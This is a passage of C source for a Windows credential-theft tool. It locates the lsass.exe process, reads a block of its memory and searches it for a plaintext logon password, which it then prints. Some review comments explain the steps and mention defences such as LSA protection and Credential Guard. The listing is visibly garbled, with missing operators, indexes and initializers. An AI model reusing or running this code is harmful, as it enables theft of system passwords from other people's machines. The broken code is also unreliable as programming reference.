Is Not Separated With A Space , But With A Ending Character , So Any Search API Like strstr() Will Fail To Locate
The Magic String , We Have To Do It Manually And Slowly
*/
if (Buffer == "L")
{
OffSet = 0;
if (strnicmp(&Buffer[iOffSet] , "LocalSystem" , strlen("LocalSystem")) == 0)
{
OffSet= strlen("LocalSystem")1;
if (strnicmp(&Buffer[iOffSet] , "Remote" , strlen("Remote")) == 0)
{
OffSet= strlen("Remote")1;
if (strnicmp(&Buffer[iOffSet] , "Procedure" , strlen("Procedure")) == 0)
{
OffSet= strlen("Procedure")1;
if (strnicmp(&Buffer[iOffSet] , "Call" , strlen("Call")) == 0)
{
i= OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password , sizeof(Password));
for (; i < nSize ; i)
{
if (Buffer == 0x02 && Buffer[i1] == 0 && Buffer[i2] == 0 && Buffer[i3] == 0 && Buffer[i4] == 0 && Buffer[i5] == 0 && Buffer[i6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format , So We Will Do It In
That Way
*/
j = i7;
for (; j < nSize; j= 2)
{
if (Buffer[j] > 0)
{
Password[Count] = Buffer[j];
}
else
{
break;
}
}
return i7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well , We Fail To Find The Password , And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
    /*
     * Walk a Toolhelp process snapshot and return the PID of the first
     * entry whose image name compares equal (case-insensitively) to
     * "Lsass.EXE". Returns 0 when the snapshot cannot be created, when
     * the first entry cannot be read, or when no such process exists.
     * The snapshot handle is closed on every return path after creation.
     */
    DWORD lsass_pid = 0;
    PROCESSENTRY32 entry;
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS , 0);

    if (snapshot == INVALID_HANDLE_VALUE)
    {
        printf("Fail To Create Snap Shotn");
        return 0;
    }

    /* dwSize must be set before Process32First or the call fails. */
    entry.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(snapshot , &entry))
    {
        CloseHandle(snapshot);
        return 0;
    }

    for (;;)
    {
        if (strcmpi(entry.szExeFile , "Lsass.EXE") == 0)
        {
            lsass_pid = entry.th32ProcessID;
            break;
        }
        if (!Process32Next(snapshot , &entry))
        {
            break;
        }
    }

    CloseHandle(snapshot);
    return lsass_pid;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
/* Opens the process identified by PID for memory reading, copies a fixed
 * 5 KiB window starting at the file-scope BaseAddress into a local buffer,
 * and hands that buffer to Search(). Returns FALSE only when OpenProcess
 * or ReadProcessMemory fails; once the read succeeds it returns TRUE
 * whether or not Search() located anything, so callers cannot use the
 * return value to learn the search outcome (only the printed output).
 *
 * NOTE(review): the target is the Local Security Authority process, and
 * PROCESS_VM_READ against it is the access that LSA protection /
 * Credential Guard and EDR memory-access monitoring exist to block or
 * alert on; on a hardened host the OpenProcess below is expected to fail.
 */
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = ; // NOTE(review): initializer is garbled in this copy of the listing
DWORD ByteGet = 0; // Number of bytes ReadProcessMemory actually copied; may be less than the request
int Found = -1; // Search() result: offset >= 0 on a hit, -1 when nothing matched
hProcess = OpenProcess(PROCESS_VM_READ , FALSE , PID); // Open Process with read-only memory access
if (hProcess == NULL)
{
printf("Fail To Open Processn");
return FALSE;
}
/* BaseAddress is a file-scope value not visible in this block; its origin is not shown here. */
if (!ReadProcessMemory(hProcess , (PVOID)BaseAddress , Buffer , 5 * 1024 , &ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memoryn");
CloseHandle(hProcess); // Release the handle on the failure path too
return FALSE;
}
CloseHandle(hProcess); // The handle is no longer needed once the window is in Buffer
/* Only the bytes actually read are searched. Search() writes its result
 * into the file-scope Password array as a side effect. */
Found = Search(Buffer , ByteGet); // Search The Password
if (Found >= 0) // Search() reported a match offset
{
if (strlen(Password) > 0) // Yes , We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
/* FoundBaseAddress is not defined in this block; presumably set elsewhere
 * (e.g. by Search()) -- verify before relying on the printed address. */
printf("Found Password At #0x%x -> "%s"n" , FoundBaseAddress , Password);
}
}
else
{
printf("Fail To Find The Passwordn");
}
return TRUE; // Reached on every path after a successful read, regardless of Found
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------